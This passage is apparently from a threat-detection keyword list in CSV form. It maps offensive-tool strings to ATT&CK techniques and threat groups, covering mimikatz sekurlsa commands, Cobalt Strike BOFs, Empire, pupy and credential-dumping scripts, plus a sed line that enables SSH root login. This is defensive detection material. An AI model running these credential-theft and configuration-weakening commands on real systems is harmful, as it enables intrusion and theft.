T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*secretsdump.py*,offensive_tool_keyword,POC,script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*secretsquirrel/the-backdoor-factory*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*sec-shinject *,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,0,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*securesocketfunneling*,offensive_tool_keyword,securesocketfunneling,Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer,T1071.001 - T1573 - T1572,TA0003 - TA0009 - ,N/A,N/A,POST Exploitation tools,https://securesocketfunneling.github.io/ssf/#home,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*security-onion*,offensive_tool_keyword,security-onion,Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes,T1059 - T1059.001 - T1059.003 - T1059.004,TA0002 - TA0003 - TA0004 - TA0005,N/A,N/A,Infosec Operation system,https://github.com/Security-Onion-Solutions/security-onion,1,1,N/A,N/A,10,3033,534,2021-04-16T12:14:31Z,2015-03-24T20:15:23Z -*securitywithoutborders*,offensive_tool_keyword,Github Username,pentest documentations,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/securitywithoutborders,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*,greyware_tool_keyword,sed,allowing root login for ssh,T1078 - T1078.003 - T1021 - T1021.004,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,N/A,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*SeeYouCM-Thief.git*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*SeeYouCM-Thief-main*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*sekurlsa *,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::backupkeys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::bootkey*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::cloudap*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::credman*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::dpapi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::dpapisystem*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::ekeys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::kerberos*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::krbtgt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::livessp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::logonpasswords*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::minidump*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::msv*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::process*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::pth*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::ssp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::tickets*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::trust*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::tspkg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::wdigest*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*SELECT * FROM EvilSignature*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*SELECT * FROM EvilSignature*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*SELECT displayName FROM AntiVirusProduct*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,0,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*self_delete.x64.o*,offensive_tool_keyword,cobaltstrike,BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Self_Deletion_BOF,1,1,N/A,10,10,159,22,2021-10-03T19:10:21Z,2021-10-03T19:01:14Z -*Self_Deletion_BOF*,offensive_tool_keyword,cobaltstrike,BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Self_Deletion_BOF,1,1,N/A,10,10,159,22,2021-10-03T19:10:21Z,2021-10-03T19:01:14Z -*-selfdelete.exe -d:selfdelete*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*SeManageVolumeExploit.*,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*SeManageVolumeExploit-main,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*Semperis/GoldenGMSA*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*Send the payload with the grooms*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*send_ps1_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 